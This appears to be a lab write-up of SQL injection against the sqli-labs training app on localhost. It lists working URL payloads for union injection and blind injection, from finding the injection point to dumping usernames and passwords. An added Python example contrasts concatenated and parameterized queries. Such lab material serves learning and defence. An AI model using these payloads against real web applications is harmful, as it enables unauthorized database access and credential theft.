Union injection
1. Find the injection point
http://127.0.0.1/sqlilab/Less-1/?id=1
http://127.0.0.1/sqlilab/Less-1/?id=1'
Guessed source query:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
2. Determine the number of columns
http://127.0.0.1/sqlilab/Less-1/?id=1' order by 3 --+
http://127.0.0.1/sqlilab/Less-1/?id=1' order by 4 --+
3. Dump the database
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,database() --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
Blind injection
1. Guess the database version one character at a time
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(version(),6)='5.6.17' --+
left(a,b) returns the first b characters of string a, counting from the left
2. Guess the database name one character at a time
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(database(),1)>'a' --+
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(database(),8)='security' --+
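As an added example (not from the original notes or from sqli-labs), the guessed `id='$id' LIMIT 0,1` query is run both as string concatenation and with a bound parameter against a constructed in-memory SQLite table that stands in for `security.users`; it shows why the `-1' union select 1,2,3` and `1' and ...` inputs above change the query's meaning when concatenated but are treated as plain data when bound. SQLite is an assumption here (the lab runs on MySQL), so MySQL-only functions such as `database()` and `left()` are not used.

```python
import sqlite3

# Constructed stand-in for the lab's users table (id, username, password).
SAMPLE_ROWS = [(1, "alice", "pw1"), (2, "bob", "pw2")]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the guessed lab query: the input is spliced into the SQL text.

    A single quote in `user_id` closes the string literal, so everything after
    it is parsed as SQL (a UNION, an AND condition, a comment hiding LIMIT).
    """
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter: the value never reaches the parser.

    The driver compares the whole input against `id` as data, so quotes,
    UNION and comment sequences have no SQL meaning.
    """
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # `--+` in the URL decodes to `-- ` (comment plus the required space).
    union_input = "-1' union select 1,2,3 -- "
    boolean_input = "1' and 1=1 -- "
    for label, fn in (("concatenated", lookup_vulnerable),
                      ("parameterized", lookup_parameterized)):
        print(label, "id=1:", fn(db, "1"))
        print(label, "union:", fn(db, union_input))
        print(label, "boolean:", fn(db, boolean_input))
```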